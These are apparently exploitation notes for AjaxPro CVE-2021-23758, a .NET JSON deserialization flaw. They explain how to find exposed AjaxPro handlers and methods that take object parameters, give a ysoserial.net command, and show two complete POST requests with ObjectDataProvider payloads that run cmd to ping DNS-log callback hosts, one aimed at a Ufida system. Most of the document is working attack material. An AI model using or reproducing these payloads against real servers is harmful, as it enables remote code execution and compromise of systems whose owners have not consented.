AjaxPro CVE-2021-23758 vulnerability notes

Published: 2024-03-28

1. Typically found on ASP.NET sites.

In the page source you will see a script include such as /ajaxpro/gust_search,wlms.ashx. AjaxPro registers one handler per exposed class, and the URL always has the form /ajaxpro/<type full name>,<assembly name>.ashx, so the path gives you both the class and the assembly.
If you have the source code, copy every .aspx path into a .txt file, strip the semicolons and the spaces between them, and request the paths in a batch to collect the handler URLs.


2. The AjaxPro component is affected by CVE-2021-23758: any method marked [AjaxPro.AjaxMethod] or [AjaxMethod] that takes a parameter of type object can be used for RCE. The JSON request body is deserialized honouring a client-supplied __type, so the attacker chooses which .NET type gets instantiated (the ObjectDataProvider chain below starts a process).

Search the source for "public" and "object" to find such methods.

The JSON key ("obj" in the first request below) is the name of the object parameter, i.e. the identifier that follows object in the method signature.
X-Ajaxpro-Method is the name of the method that precedes that parameter list; the request path is the .ashx handler of the class that declares it. If the method name is already passed in the query string (?method=...), the header is not needed; the captures below send both.

Generate the payload with ysoserial.net and substitute it for the JSON body in the requests below (recompute Content-Length, or let Burp do it):

ysoserial.exe -g ObjectDataProvider -f JavaScriptSerializer -c "ping dnslog" -o raw

Example 1:

POST /ajaxpro/gust_search,ppms.ashx?method=Ajaxpro HTTP/2
Host: 127.0.0.1
Cookie: ASP.NET_SessionId=pvht0n45im23adqck1mlurap
Content-Length: 584
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
X-Ajaxpro-Method: Ajaxpro
Content-Type: text/plain; charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://localhost:44375
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://localhost:44375/demo
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7

{"obj":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
        "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
            "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "FileName":"cmd",
            "Arguments":"/c ping 123.dnslog.cn"
        }
    }
}}


Example 2 (a Ufida target; the handler class is compiled into App_Code):

POST /ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore/;/login HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
X-Ajaxpro-Method: GetStoreWarehouseByStore
Host: 192.168.37.168:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-type: application/x-www-form-urlencoded
Content-Length: 604

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
        "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
            "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "FileName":"cmd", "Arguments":"/c ping d4e5b59b8a.ipv6.1433.eu.org."
        }
    }
  }
}
